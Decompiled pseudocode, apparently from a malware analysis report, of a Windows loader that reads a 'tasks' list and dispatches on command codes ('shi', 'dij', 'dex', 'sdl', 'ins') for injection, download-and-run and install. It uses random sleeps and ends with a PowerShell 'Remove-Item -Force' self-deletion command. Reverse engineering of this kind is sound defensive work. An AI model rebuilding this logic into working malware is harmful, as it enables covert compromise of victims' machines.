                                        				 *(_t988 + 0x38) = _t717;
                                        				 *((short*)(_t988 + 0x3e)) = 0x405;
                                        				_t720 =  *(_t988 + 0x38) & 0x00000000 | "tasks";
                                        				 *(_t988 + 0x38) = _t720;
                                        				 *(_t988 + 0x30) = 5;
                                        				E0000021E21EF2FEBA50(_t988 + 0xc0, _t988 + 0x30, _t976, 0, _t988, _t1030, _t1034);
                                        				if ( *((short*)(_t720 + 0xe)) != 4) goto 0xf2fea155;
                                        				 *(_t988 + 0x70) = _t720;
                                        				 *(_t988 + 0x78) = _t720;
                                        				 *((short*)(_t988 + 0x7e)) = 0x405;
                                        				 *(_t988 + 0x78) =  *(_t988 + 0x78) & 0x00000000 | "tasks";
                                        				 *(_t988 + 0x70) = 5;
                                        				E0000021E21EF2FEB090(E0000021E21EF2FEBA50(_t988 + 0xc0, _t988 + 0x70, _t976, 0, _t988, _t1030, _t1034),  *(_t988 + 0x78) & 0x00000000 | "tasks", _t988 + 0x1c8);
                                        				_t724 =  *((intOrPtr*)(_t988 + 0x1c8));
                                        				_t985 = _t724[2] & 0xffffffff;
                                        				r15d =  *_t724;
                                        				_t1036 = (_t1034 << 4) + _t985;
                                        				if (_t985 == _t1036) goto 0xf2fea152;
                                        				r12d = 0x1000;
                                        				 *(_t988 + 0x250) = _t724;
                                        				 *(_t988 + 0x258) = _t724;
                                        				 *(_t988 + 0x258) = 0xf;
                                        				 *(_t988 + 0x250) = _t724;
                                        				 *((char*)(_t988 + 0x240)) = 0;
                                        				 *(_t988 + 0x278) = _t724;
                                        				 *(_t988 + 0x280) = _t724;
                                        				 *(_t988 + 0x280) = 0xf;
                                        				 *(_t988 + 0x278) = _t724;
                                        				 *((char*)(_t988 + 0x268)) = 0;
                                        				 *(_t988 + 0x298) = _t724;
                                        				 *(_t988 + 0x2a0) = _t724;
                                        				 *(_t988 + 0x2a0) = 0xf;
                                        				 *(_t988 + 0x298) = _t724;
                                        				 *((char*)(_t988 + 0x288)) = 0;
                                        				if ( *((short*)(_t985 + 0xe)) != 3) goto 0xf2fea112;
                                        				_t726 =  *(_t985 + 8) & 0xffffffff;
                                        				_t781 = (_t779 << 5) + _t726;
                                        				_t992 = "task_data";
                                        				E0000021E21EF2FEB470(_t559, _t781, _t985, _t988 + 0x360, _t985, _t988, _t992);
                                        				if ( *_t726 == _t781) goto 0xf2fe9e4e;
                                        				 *(_t988 + 0x80) = _t726;
                                        				 *(_t988 + 0x88) = _t726;
                                        				 *((short*)(_t988 + 0x8e)) = 0x405;
                                        				_t729 =  *(_t988 + 0x88) & 0x00000000 | "task_data";
                                        				 *(_t988 + 0x88) = _t729;
                                        				 *(_t988 + 0x80) = 9;
                                        				E0000021E21EF2FEBA50(_t985, _t988 + 0x80, _t976, _t985, _t988, _t1030, _t1036);
                                        				if (( *(_t729 + 0xe) & r12w) != 0) goto 0xf2fe9e27;
                                        				_t731 =  *(_t729 + 8) & 0xffffffff;
                                        				if ( *_t731 != 0) goto 0xf2fe9e31;
                                        				r8d = 0;
                                        				goto 0xf2fe9e3f;
                                        				if ( *((char*)(_t731 + (_t992 | 0xffffffff) + 1)) != 0) goto 0xf2fe9e35;
                                        				E0000021E21EF2FE6400(_t781, _t988 + 0x268, _t731, _t985, (_t992 | 0xffffffff) + 1);
                                        				_t733 =  *(_t985 + 8) & 0xffffffff;
                                        				_t783 = (_t781 << 5) + _t733;
                                        				_t995 = "task";
                                        				E0000021E21EF2FEB470(_t559, _t783, _t985, _t988 + 0x348, _t985, _t988, _t995);
                                        				if ( *_t733 == _t783) goto 0xf2fe9f0d;
                                        				 *(_t988 + 0x90) = _t733;
                                        				 *(_t988 + 0x98) = _t733;
                                        				 *((short*)(_t988 + 0x9e)) = 0x405;
                                        				_t736 =  *(_t988 + 0x98) & 0x00000000 | "task";
                                        				 *(_t988 + 0x98) = _t736;
                                        				 *(_t988 + 0x90) = 4;
                                        				E0000021E21EF2FEBA50(_t985, _t988 + 0x90, _t976, _t985, _t988, _t1030, _t1036);
                                        				if (( *(_t736 + 0xe) & r12w) != 0) goto 0xf2fe9ee6;
                                        				_t738 =  *(_t736 + 8) & 0xffffffff;
                                        				if ( *_t738 != 0) goto 0xf2fe9ef0;
                                        				r8d = 0;
                                        				goto 0xf2fe9efe;
                                        				if ( *((char*)(_t738 + (_t995 | 0xffffffff) + 1)) != 0) goto 0xf2fe9ef4;
                                        				E0000021E21EF2FE6400(_t783, _t988 + 0x240, _t738, _t985, (_t995 | 0xffffffff) + 1);
                                        				_t740 =  *(_t985 + 8) & 0xffffffff;
                                        				_t785 = (_t783 << 5) + _t740;
                                        				E0000021E21EF2FEB470(_t559, _t785, _t985, _t988 + 0x350, _t985, _t988, "task_id");
                                        				if ( *_t740 == _t785) goto 0xf2fe9f9b;
                                        				 *(_t988 + 0xa0) = _t740;
                                        				 *(_t988 + 0xa8) = _t740;
                                        				 *((short*)(_t988 + 0xae)) = 0x405;
                                        				_t743 =  *(_t988 + 0xa8) & 0x00000000 | "task_id";
                                        				 *(_t988 + 0xa8) = _t743;
                                        				 *(_t988 + 0xa0) = 7;
                                        				E0000021E21EF2FEBA50(_t985, _t988 + 0xa0, _t976, _t985, _t988, _t1030, _t1036);
                                        				 *((intOrPtr*)(_t988 + 0x260)) =  *_t743;
                                        				_t745 =  *(_t985 + 8) & 0xffffffff;
                                        				_t787 = (_t785 << 5) + _t745;
                                        				_t999 = "file_entry_point";
                                        				E0000021E21EF2FEB470(_t559, _t787, _t985, _t988 + 0x358, _t985, _t988, _t999);
                                        				if ( *_t745 == _t787) goto 0xf2fea05a;
                                        				 *(_t988 + 0xb0) = _t745;
                                        				 *(_t988 + 0xb8) = _t745;
                                        				 *((short*)(_t988 + 0xbe)) = 0x405;
                                        				_t748 =  *(_t988 + 0xb8) & 0x00000000 | "file_entry_point";
                                        				 *(_t988 + 0xb8) = _t748;
                                        				 *(_t988 + 0xb0) = 0x10;
                                        				E0000021E21EF2FEBA50(_t985, _t988 + 0xb0, _t976, _t985, _t988, _t1030, _t1036);
                                        				if (( *(_t748 + 0xe) & r12w) != 0) goto 0xf2fea033;
                                        				_t750 =  *(_t748 + 8) & 0xffffffff;
                                        				if ( *_t750 != 0) goto 0xf2fea03d;
                                        				r8d = 0;
                                        				goto 0xf2fea04b;
                                        				if ( *((char*)(_t750 + (_t999 | 0xffffffff) + 1)) != 0) goto 0xf2fea041;
                                        				_t422 = E0000021E21EF2FE6400(_t787, _t988 + 0x288, _t750, _t985, (_t999 | 0xffffffff) + 1);
                                        				if (_t988 + 0x240 - _t1030 >= 0) goto 0xf2fea0d3;
                                        				if (_t976 - _t988 + 0x240 > 0) goto 0xf2fea0d3;
                                        				if (_t1030 !=  *((intOrPtr*)(_t988 - 0x20))) goto 0xf2fea0b1;
                                        				E0000021E21EF2FEB0F0(_t422 * (_t988 + 0x240 - _t976), _t988 - 0x30);
                                        				_t1031 =  *(_t988 - 0x28);
                                        				 *(_t988 + 8) = _t1031;
                                        				 *(_t988 + 0x1d0) = _t1031;
                                        				if (_t1031 == 0) goto 0xf2fea0d1;
                                        				_t425 = E0000021E21EF2FEBCF0(_t750 >> 5 >> 0x3f, (_t750 >> 5) + (_t750 >> 5 >> 0x3f), _t1031, ((_t750 >> 5) + (_t750 >> 5 >> 0x3f)) * 0x70 +  *((intOrPtr*)(_t988 - 0x30)), _t1019);
                                        				goto 0xf2fea10a;
                                        				if (_t1031 !=  *((intOrPtr*)(_t988 - 0x20))) goto 0xf2fea0ea;
                                        				E0000021E21EF2FEB0F0(_t425, _t988 - 0x30);
                                        				_t1032 =  *(_t988 - 0x28);
                                        				_t978 =  *((intOrPtr*)(_t988 - 0x30));
                                        				 *(_t988 + 0x1d0) = _t1032;
                                        				 *(_t988 + 8) = _t1032;
                                        				if (_t1032 == 0) goto 0xf2fea10a;
                                        				_t427 = E0000021E21EF2FEBCF0(_t750 >> 5 >> 0x3f, (_t750 >> 5) + (_t750 >> 5 >> 0x3f), _t1032, _t988 + 0x240, _t1019);
                                        				_t1033 = _t1032 + 0x70;
                                        				 *(_t988 - 0x28) = _t1033;
                                        				E0000021E21EF2FE6100(E0000021E21EF2FE6100(E0000021E21EF2FE6100(_t427, _t514, _t988 + 0x288), _t514, _t988 + 0x268), _t514, _t988 + 0x240);
                                        				if (_t985 + 0x10 != _t1036) goto 0xf2fe9d10;
                                        				r12d =  *((intOrPtr*)(_t988 + 0x5e0));
                                        				r13d = 3;
                                        				r15d = 0;
                                        				if (r12d != 1) goto 0xf2fea70b;
                                        				if (_t978 != _t1033) goto 0xf2fea279;
                                        				r8d = E0000021E21EF3111C60(_t750 >> 5 >> 0x3f);
                                        				r8d = r8d - (0x28c1979 * r8d >> 0x20 >> 1) * 0xc9;
                                        				r8d = r8d + 0x19;
                                        				_t516 = r8d * 0x3e8;
                                        				Sleep(??);
                                        				if ( *(_t988 + 0xd8) == 0) goto 0xf2fea1a7;
                                        				E0000021E21EF2FEB260(0x28c1979 * r8d, (_t750 >> 5) + (_t750 >> 5 >> 0x3f),  *(_t988 + 0xd8));
                                        				0xf3111fb0();
                                        				0xf310bdc8();
                                        				_t756 =  *((intOrPtr*)(_t988 - 0x78));
                                        				if (_t756 - 0x10 < 0) goto 0xf2fea218;
                                        				_t855 =  *((intOrPtr*)(_t989 + 0x70));
                                        				if (_t756 + 1 - _t978 < 0) goto 0xf2fea213;
                                        				if ((_t516 & 0x0000001f) != 0) goto 0xf2fea8bf;
                                        				_t758 =  *((intOrPtr*)(_t855 - 8));
                                        				if (_t758 - _t855 >= 0) goto 0xf2fea8b9;
                                        				_t856 = _t855 - _t758;
                                        				if (_t856 - 8 < 0) goto 0xf2fea8b3;
                                        				if (_t856 - 0x27 > 0) goto 0xf2fea8ad;
                                        				0xf310ba8c();
                                        				 *((long long*)(_t988 - 0x78)) = 0xf;
                                        				 *(_t988 - 0x80) = _t1036;
                                        				 *((char*)(_t989 + 0x70)) = 0;
                                        				_t759 =  *((intOrPtr*)(_t988 - 0x38));
                                        				if (_t759 - 0x10 < 0) goto 0xf2fe98ee;
                                        				_t858 =  *((intOrPtr*)(_t988 - 0x50));
                                        				if (_t759 + 1 - _t978 < 0) goto 0xf2fe98e9;
                                        				if ((_t516 & 0x0000001f) != 0) goto 0xf2fea8d7;
                                        				_t761 =  *((intOrPtr*)(_t858 - 8));
                                        				if (_t761 - _t858 >= 0) goto 0xf2fea8d1;
                                        				_t859 = _t858 - _t761;
                                        				if (_t859 - 8 < 0) goto 0xf2fea8cb;
                                        				if (_t859 - 0x27 > 0) goto 0xf2fea8c5;
                                        				goto 0xf2fe98e6;
                                        				r12d = 1;
                                        				_t236 = _t988 + 0x10; // 0x13
                                        				E0000021E21EF2FE5D10(_t563, (_t750 >> 5) + (_t750 >> 5 >> 0x3f), _t236, _t978 + 0x28);
                                        				_t987 =  *((intOrPtr*)(_t978 + 0x18));
                                        				if (_t987 - 0x10 < 0) goto 0xf2fea29d;
                                        				goto 0xf2fea2a0;
                                        				_t791 =  *((intOrPtr*)(_t978 + 0x10));
                                        				_t1003 =  <  ? _t791 : 0xffffffff;
                                        				_t640 =  <  ? _t791 : 0xffffffff;
                                        				if (( <  ? _t791 : 0xffffffff) == 0) goto 0xf2fea2c8;
                                        				if (E0000021E21EF310E7C0(_t516, _t978, "shi",  <  ? _t791 : 0xffffffff) != 0) goto 0xf2fea382;
                                        				if (_t791 != 3) goto 0xf2fea382;
                                        				r8d = 0x208;
                                        				E0000021E21EF310E410(_t516, 0, 0x1000, _t563, 0xf320b2a0, "shi", _t978,  <  ? _t791 : 0xffffffff);
                                        				E0000021E21EF3111C60(_t761);
                                        				r9d = 0;
                                        				_t245 = _t1019 + 0x26; // 0x26
                                        				r8d = _t245;
                                        				__imp__SHGetSpecialFolderPathA();
                                        				lstrcatA(??, ??);
                                        				 *((long long*)(_t988 + 0x170)) = _t761;
                                        				 *((long long*)(_t988 + 0x178)) = _t761;
                                        				 *((long long*)(_t988 + 0x180)) = _t761;
                                        				E0000021E21EF3017F50(_t761, _t791, _t988 + 0x170, _t978, _t987, _t1019);
                                        				if ( *((intOrPtr*)(_t988 + 0x180)) == 0) goto 0xf2fea2e0;
                                        				r13d = 3;
                                        				_t253 = _t988 + 0x10; // 0x13
                                        				E0000021E21EF2FE7390(_t761,  *((intOrPtr*)(_t988 + 0x170)),  *((intOrPtr*)(_t988 + 0x178)), _t253, 0xf31b0230);
                                        				goto 0xf2fea618;
                                        				if (_t987 - 0x10 < 0) goto 0xf2fea38d;
                                        				goto 0xf2fea390;
                                        				_t1006 =  <  ? _t791 : 0xf31b0230;
                                        				_t646 =  <  ? _t791 : 0xf31b0230;
                                        				if (( <  ? _t791 : 0xf31b0230) == 0) goto 0xf2fea3b4;
                                        				if (E0000021E21EF310E7C0(0, _t978, "dij",  <  ? _t791 : 0xf31b0230) != 0) goto 0xf2fea46f;
                                        				if (_t791 != 3) goto 0xf2fea46f;
                                        				asm("o16 nop [eax+eax]");
                                        				r8d = 0x208;
                                        				E0000021E21EF310E410(0, 0, 0x1000, _t563, 0xf320b2a0, "dij", _t978,  <  ? _t791 : 0xf31b0230);
                                        				_t447 = E0000021E21EF3111C60(_t761);
                                        				r9d = 0;
                                        				_t262 = _t1019 + 0x26; // 0x26
                                        				r8d = _t262;
                                        				__imp__SHGetSpecialFolderPathA();
                                        				lstrcatA(??, ??);
                                        				 *((long long*)(_t988 + 0x158)) = _t761;
                                        				 *((long long*)(_t988 + 0x160)) = _t761;
                                        				 *((long long*)(_t988 + 0x168)) = _t761;
                                        				E0000021E21EF3017F50(_t761, _t791, _t988 + 0x158, _t978, _t987, _t1019);
                                        				if ( *((intOrPtr*)(_t988 + 0x168)) == 0) goto 0xf2fea3d0;
                                        				E0000021E21EF2FE7560(_t791,  *((intOrPtr*)(_t988 + 0x158)),  *((intOrPtr*)(_t988 + 0x160)), _t987, _t988, _t988 + 0x10, _t978 + 0x48);
                                        				goto 0xf2fea618;
                                        				if (_t987 - 0x10 < 0) goto 0xf2fea47a;
                                        				goto 0xf2fea47d;
                                        				_t1009 =  <  ? _t791 : 0xf31b0230;
                                        				_t652 =  <  ? _t791 : 0xf31b0230;
                                        				if (( <  ? _t791 : 0xf31b0230) == 0) goto 0xf2fea49d;
                                        				if (E0000021E21EF310E7C0(0, _t978, "dex",  <  ? _t791 : 0xf31b0230) != 0) goto 0xf2fea504;
                                        				if (_t791 != 3) goto 0xf2fea504;
                                        				r9d = 0;
                                        				r8d = _t791 + 0x19;
                                        				__imp__SHGetSpecialFolderPathA();
                                        				lstrcatA(??, ??);
                                        				_t959 =  >=  ?  *((void*)(_t988 + 0x10)) : _t988 + 0x10;
                                        				r8d =  *(_t988 + 0x20);
                                        				if (E0000021E21EF301B91C(_t761, _t791, 0xf320b2a0,  >=  ?  *((void*)(_t988 + 0x10)) : _t988 + 0x10, _t987, _t978 + 0x48) == 0) goto 0xf2fea620;
                                        				0xf301c460();
                                        				goto 0xf2fea61c;
                                        				if (_t987 - 0x10 < 0) goto 0xf2fea50f;
                                        				goto 0xf2fea512;
                                        				_t1011 =  <  ? _t791 : 0xf31b0230;
                                        				_t659 =  <  ? _t791 : 0xf31b0230;
                                        				if (( <  ? _t791 : 0xf31b0230) == 0) goto 0xf2fea537;
                                        				if (E0000021E21EF310E7C0(0, _t978, "sdl",  <  ? _t791 : 0xf31b0230) == 0) goto 0xf2fea537;
                                        				r15d = 0;
                                        				goto 0xf2fea552;
                                        				if (_t791 - 3 >= 0) goto 0xf2fea545;
                                        				r15d = 0;
                                        				goto 0xf2fea552;
                                        				r15d = 0;
                                        				if ((r15d & 0xffffff00 | _t791 - 0x00000003 > 0x00000000) == 0) goto 0xf2feaab5;
                                        				if (_t987 - 0x10 < 0) goto 0xf2fea565;
                                        				goto 0xf2fea568;
                                        				_t1013 =  <  ? _t791 : 0xf31b0230;
                                        				_t666 =  <  ? _t791 : 0xf31b0230;
                                        				if (( <  ? _t791 : 0xf31b0230) == 0) goto 0xf2fea58c;
                                        				if (E0000021E21EF310E7C0(0, _t978, "ins",  <  ? _t791 : 0xf31b0230) != 0) goto 0xf2fea620;
                                        				if (_t791 - 3 >= 0) goto 0xf2fea597;
                                        				goto 0xf2fea5a1;
                                        				_t464 = r15d & 0xffffff00 | _t791 - 0x00000003 > 0x00000000;
                                        				if (_t464 != 0) goto 0xf2fea620;
                                        				if ( *((intOrPtr*)(_t988 + 0x5d8)) == _t464) goto 0xf2fea5e8;
                                        				r8d = E0000021E21EF3111C60(_t761);
                                        				r8d = r8d - (0x28c1979 * r8d >> 0x20 >> 1) * 0xc9;
                                        				r8d = r8d + 0x19;
                                        				_t523 = r8d * 0x3e8;
                                        				Sleep(??);
                                        				E0000021E21EF2FE6100(0x28c1979 * r8d, _t523, _t988 + 0x10);
                                        				goto 0xf2fea681;
                                        				 *((char*)(_t989 + 0x20)) = 0;
                                        				_t469 = E0000021E21EF2FE76A0(0x28c1979 * r8d >> 0x20 >> 1, _t791, _t988 + 0x2b0, _t988 + 0x420, _t978, _t987, _t988 + 0x188, _t988 + 0x138, _t1027);
                                        				if (_t469 != 0) goto 0xf2fea8dd;
                                        				goto 0xf2fea5ad;
                                        				if (_t469 == 0) goto 0xf2fea620;
                                        				 *((intOrPtr*)(_t978 + 0x68)) = r12d;
                                        				_t762 =  *((intOrPtr*)(_t988 + 0x28));
                                        				if (_t762 - 0x10 < 0) goto 0xf2fea66e;
                                        				_t882 =  *((intOrPtr*)(_t988 + 0x10));
                                        				if (_t762 + 1 - 0x1000 < 0) goto 0xf2fea669;
                                        				if ((_t523 & 0x0000001f) != 0) goto 0xf2feaaaf;
                                        				_t764 =  *((intOrPtr*)(_t882 - 8));
                                        				if (_t764 - _t882 >= 0) goto 0xf2feaaa9;
                                        				_t883 = _t882 - _t764;
                                        				if (_t883 - 8 < 0) goto 0xf2feaaa3;
                                        				if (_t883 - 0x27 > 0) goto 0xf2feaa9d;
                                        				0xf310ba8c();
                                        				 *((long long*)(_t988 + 0x28)) = 0xf;
                                        				r15d = 0;
                                        				 *(_t988 + 0x20) = 0xf31b0230;
                                        				 *((intOrPtr*)(_t988 + 0x10)) = r15b;
                                        				_t979 = _t978 + 0x70;
                                        				if (_t979 != _t1033) goto 0xf2fea280;
                                        				r8d = E0000021E21EF3111C60(_t764);
                                        				r8d = r8d - (0x28c1979 * r8d >> 0x20 >> 1) * 0xc9;
                                        				r8d = r8d + 0x19;
                                        				Sleep(??);
                                        				if ( *(_t988 + 0xd8) == 0) goto 0xf2fea6cd;
                                        				_t473 = E0000021E21EF2FEB260(0x28c1979 * r8d, _t791,  *(_t988 + 0xd8));
                                        				0xf3111fb0();
                                        				0xf310bdc8();
                                        				E0000021E21EF2FE6100(E0000021E21EF2FE6100(_t473, r8d * 0x3e8, _t989 + 0x70), r8d * 0x3e8, _t988 - 0x50);
                                        				goto 0xf2fe9742;
                                        				r8d = E0000021E21EF3111C60(_t764);
                                        				r8d = r8d - (0x28c1979 * r8d >> 0x20 >> 1) * 0xc9;
                                        				r8d = r8d + 0x19;
                                        				_t527 = r8d * 0x3e8;
                                        				Sleep(??);
                                        				if ( *(_t988 + 0xd8) == 0) goto 0xf2fea74a;
                                        				E0000021E21EF2FEB260(0x28c1979 * r8d, _t791,  *(_t988 + 0xd8));
                                        				0xf3111fb0();
                                        				0xf310bdc8();
                                        				_t765 =  *((intOrPtr*)(_t988 - 0x78));
                                        				if (_t765 - 0x10 < 0) goto 0xf2fea7bb;
                                        				_t893 =  *((intOrPtr*)(_t989 + 0x70));
                                        				if (_t765 + 1 - _t979 < 0) goto 0xf2fea7b6;
                                        				if ((_t527 & 0x0000001f) != 0) goto 0xf2feada7;
                                        				_t767 =  *((intOrPtr*)(_t893 - 8));
                                        				if (_t767 - _t893 >= 0) goto 0xf2feada1;
                                        				_t894 = _t893 - _t767;
                                        				if (_t894 - 8 < 0) goto 0xf2fead9b;
                                        				if (_t894 - 0x27 > 0) goto 0xf2fead95;
                                        				0xf310ba8c();
                                        				 *((long long*)(_t988 - 0x78)) = 0xf;
                                        				 *(_t988 - 0x80) = 0xf31b0230;
                                        				 *((char*)(_t989 + 0x70)) = 0;
                                        				_t768 =  *((intOrPtr*)(_t988 - 0x38));
                                        				if (_t768 - 0x10 < 0) goto 0xf2fe98ee;
                                        				_t896 =  *((intOrPtr*)(_t988 - 0x50));
                                        				if (_t768 + 1 - _t979 < 0) goto 0xf2fe98e9;
                                        				if ((_t527 & 0x0000001f) != 0) goto 0xf2feadbf;
                                        				_t770 =  *((intOrPtr*)(_t896 - 8));
                                        				if (_t770 - _t896 >= 0) goto 0xf2feadb9;
                                        				_t897 = _t896 - _t770;
                                        				if (_t897 - 8 < 0) goto 0xf2feadb3;
                                        				if (_t897 - 0x27 > 0) goto 0xf2feadad;
                                        				goto 0xf2fe98e6;
                                        				r8d = E0000021E21EF3111C60(_t770);
                                        				r8d = r8d - (0x28c1979 * r8d >> 0x20 >> 1) * 0xc9;
                                        				r8d = r8d + 0x19;
                                        				Sleep(??);
                                        				goto 0xf2fe9742;
                                        				0xf3111be8();
                                        				asm("int3");
                                        				0xf3111be8();
                                        				asm("int3");
                                        				0xf3111be8();
                                        				asm("int3");
                                        				0xf3111be8();
                                        				0xf3111be8();
                                        				asm("int3");
                                        				0xf3111be8();
                                        				asm("int3");
                                        				0xf3111be8();
                                        				asm("int3");
                                        				0xf3111be8();
                                        				0xf3111be8();
                                        				asm("int3");
                                        				0xf3111be8();
                                        				asm("int3");
                                        				0xf3111be8();
                                        				asm("int3");
                                        				0xf3111be8();
                                        				0xf3111be8();
                                        				asm("int3");
                                        				0xf3111be8();
                                        				asm("int3");
                                        				0xf3111be8();
                                        				asm("int3");
                                        				0xf3111be8();
                                        				0xf3111be8();
                                        				asm("int3");
                                        				0xf3111be8();
                                        				asm("int3");
                                        				0xf3111be8();
                                        				asm("int3");
                                        				0xf3111be8();
                                        				0xf3111be8();
                                        				asm("int3");
                                        				0xf3111be8();
                                        				asm("int3");
                                        				0xf3111be8();
                                        				asm("int3");
                                        				0xf3111be8();
                                        				asm("xorps xmm0, xmm0");
                                        				asm("movdqu [ebp+0x2f0], xmm0");
                                        				 *((long long*)(_t988 + 0x300)) = 0xf31b0230;
                                        				r13d =  ==  ? r12d : r13d;
                                        				 *((intOrPtr*)(_t979 + 0x68)) = r13d;
                                        				E0000021E21EF2FEAF10(0x28c1979 * r8d, _t791, _t988 + 0x2f0, _t979);
                                        				 *((long long*)(_t989 + 0x20)) = _t988 + 0x2f0;
                                        				0xf3014e20();
                                        				_t772 = _t988 + 0x50;
                                        				 *((long long*)(_t989 + 0x20)) = _t988 + 0x50;
                                        				E0000021E21EF2FE6100(E0000021E21EF2FF5CD0(_t447 - "dij" + "dij" * 2, r8d * 0x3e8, 0x28c1979 * r8d >> 0x20 >> 1, 0x1000, 0x28c1979 * r8d - 3, _t791, _t988 - 0x70, ( *0xf320b298 << 6) +  *((intOrPtr*)(_t988 + 0x120)), _t987, _t988, ( *0xf320b298 << 6) +  *((intOrPtr*)(_t988 + 0x120)) + 0x20, _t988 + 0x440), r8d * 0x3e8, _t988 - 0x70);
                                        				 *((long long*)(_t988 - 8)) = 0xf31b0230;
                                        				 *_t988 = 0xf31b0230;
                                        				 *_t988 = 0xf;
                                        				 *((long long*)(_t988 - 8)) = 0xf31b0230;
                                        				 *((char*)(_t988 - 0x18)) = 0;
                                        				r8d = 0;
                                        				E0000021E21EF2FE6530(_t791, _t988 - 0x18, _t988 + 0x138, _t979, _t987, ( *0xf320b298 << 6) +  *((intOrPtr*)(_t988 + 0x120)) + 0x20, _t988 + 0x00000440 | 0xffffffff);
                                        				 *((long long*)(_t989 + 0x60)) = 0xf31b0230;
                                        				 *((long long*)(_t989 + 0x68)) = 0xf31b0230;
                                        				 *((long long*)(_t989 + 0x68)) = 0xf;
                                        				 *((long long*)(_t989 + 0x60)) = 0xf31b0230;
                                        				 *((char*)(_t989 + 0x50)) = 0;
                                        				r8d = 0xa;
                                        				E0000021E21EF2FE6400(_t791, _t989 + 0x50, "powershell", _t987, ( *0xf320b298 << 6) +  *((intOrPtr*)(_t988 + 0x120)) + 0x20);
                                        				GetCurrentProcessId();
                                        				E0000021E21EF2FE9020(_t988 + 0x2d0);
                                        				E0000021E21EF2FEB660(_t988 + 0x50, _t988 - 0x70, _t988 + 0x50);
                                        				r8d = r8d ^ r8d;
                                        				E0000021E21EF2FE6100(E0000021E21EF2FE6100(E0000021E21EF2FE82C0(_t791, _t989 + 0x50, _t988 + 0x50, _t979, _t987, _t988, _t988 + 0x50, _t988 + 0x00000440 | 0xffffffffffffffff), r8d * 0x3e8, _t988 - 0x70), r8d * 0x3e8, _t988 + 0x2d0);
                                        				r8d = 0x15;
                                        				E0000021E21EF2FE8170(_t791, _t989 + 0x50, "; Remove-Item -Path \"", _t979, _t988, _t772);
                                        				r8d = 0;
                                        				E0000021E21EF2FE82C0(_t791, _t989 + 0x50, _t988 - 0x18, _t979, _t987, _t988, _t772, _t988 + 0x00000440 | 0xffffffffffffffff);
                                        				r8d = 8;
                                        				E0000021E21EF2FE8170(_t791, _t989 + 0x50, "\" -Force", _t979, _t988, _t772);
                                        				E0000021E21EF2FE8170(_t791, _t989 + 0x50, "\"", _t979, _t988, _t1027);
                                        				_t914 =  >=  ?  *((void*)(_t989 + 0x50)) : _t989 + 0x50;
                                        				0xf301c460();
                                        				__imp__CoUninitialize();
                                        				ExitProcess(??);
                                        			}







































































































                                        0x21ef2fea10e
                                        0x21ef2fea133
                                        0x21ef2fea13f
                                        0x21ef2fea145
                                        0x21ef2fea14c
                                        0x21ef2fea152
                                        0x21ef2fea159
                                        0x21ef2fea162
                                        0x21ef2fea16d
                                        0x21ef2fea180
                                        0x21ef2fea183
                                        0x21ef2fea187
                                        0x21ef2fea18e
                                        0x21ef2fea19f
                                        0x21ef2fea1a1
                                        0x21ef2fea1ae
                                        0x21ef2fea1c1
                                        0x21ef2fea1c7
                                        0x21ef2fea1d4
                                        0x21ef2fea1d9
                                        0x21ef2fea1e1
                                        0x21ef2fea1e6
                                        0x21ef2fea1ec
                                        0x21ef2fea1f3
                                        0x21ef2fea1f9
                                        0x21ef2fea200
                                        0x21ef2fea20a
                                        0x21ef2fea213
                                        0x21ef2fea218
                                        0x21ef2fea220
                                        0x21ef2fea224
                                        0x21ef2fea229
                                        0x21ef2fea231
                                        0x21ef2fea237
                                        0x21ef2fea241
                                        0x21ef2fea24a
                                        0x21ef2fea250
                                        0x21ef2fea257
                                        0x21ef2fea25d
                                        0x21ef2fea264
                                        0x21ef2fea26e
                                        0x21ef2fea274
                                        0x21ef2fea279
                                        0x21ef2fea284
                                        0x21ef2fea288
                                        0x21ef2fea28e
                                        0x21ef2fea296
                                        0x21ef2fea29b
                                        0x21ef2fea2a0
                                        0x21ef2fea2ab
                                        0x21ef2fea2af
                                        0x21ef2fea2b2
                                        0x21ef2fea2c2
                                        0x21ef2fea2cc
                                        0x21ef2fea2e2
                                        0x21ef2fea2ef
                                        0x21ef2fea2f4
                                        0x21ef2fea309
                                        0x21ef2fea30c
                                        0x21ef2fea30c
                                        0x21ef2fea319
                                        0x21ef2fea32e
                                        0x21ef2fea336
                                        0x21ef2fea33d
                                        0x21ef2fea344
                                        0x21ef2fea352
                                        0x21ef2fea35e
                                        0x21ef2fea360
                                        0x21ef2fea366
                                        0x21ef2fea378
                                        0x21ef2fea37d
                                        0x21ef2fea386
                                        0x21ef2fea38b
                                        0x21ef2fea397
                                        0x21ef2fea39b
                                        0x21ef2fea39e
                                        0x21ef2fea3ae
                                        0x21ef2fea3b8
                                        0x21ef2fea3c5
                                        0x21ef2fea3d2
                                        0x21ef2fea3df
                                        0x21ef2fea3e4
                                        0x21ef2fea3f9
                                        0x21ef2fea3fc
                                        0x21ef2fea3fc
                                        0x21ef2fea409
                                        0x21ef2fea41d
                                        0x21ef2fea425
                                        0x21ef2fea42c
                                        0x21ef2fea433
                                        0x21ef2fea441
                                        0x21ef2fea44d
                                        0x21ef2fea465
                                        0x21ef2fea46a
                                        0x21ef2fea473
                                        0x21ef2fea478
                                        0x21ef2fea484
                                        0x21ef2fea488
                                        0x21ef2fea48b
                                        0x21ef2fea49b
                                        0x21ef2fea4a1
                                        0x21ef2fea4a3
                                        0x21ef2fea4a6
                                        0x21ef2fea4b3
                                        0x21ef2fea4c7
                                        0x21ef2fea4d6
                                        0x21ef2fea4db
                                        0x21ef2fea4ed
                                        0x21ef2fea4fa
                                        0x21ef2fea4ff
                                        0x21ef2fea508
                                        0x21ef2fea50d
                                        0x21ef2fea519
                                        0x21ef2fea51d
                                        0x21ef2fea520
                                        0x21ef2fea530
                                        0x21ef2fea532
                                        0x21ef2fea535
                                        0x21ef2fea53b
                                        0x21ef2fea540
                                        0x21ef2fea543
                                        0x21ef2fea545
                                        0x21ef2fea554
                                        0x21ef2fea55e
                                        0x21ef2fea563
                                        0x21ef2fea56f
                                        0x21ef2fea573
                                        0x21ef2fea576
                                        0x21ef2fea586
                                        0x21ef2fea590
                                        0x21ef2fea595
                                        0x21ef2fea59e
                                        0x21ef2fea5a3
                                        0x21ef2fea5ab
                                        0x21ef2fea5b2
                                        0x21ef2fea5c5
                                        0x21ef2fea5c8
                                        0x21ef2fea5cc
                                        0x21ef2fea5d3
                                        0x21ef2fea5de
                                        0x21ef2fea5e3
                                        0x21ef2fea5e8
                                        0x21ef2fea609
                                        0x21ef2fea610
                                        0x21ef2fea616
                                        0x21ef2fea61a
                                        0x21ef2fea61c
                                        0x21ef2fea620
                                        0x21ef2fea628
                                        0x21ef2fea62d
                                        0x21ef2fea637
                                        0x21ef2fea63c
                                        0x21ef2fea642
                                        0x21ef2fea649
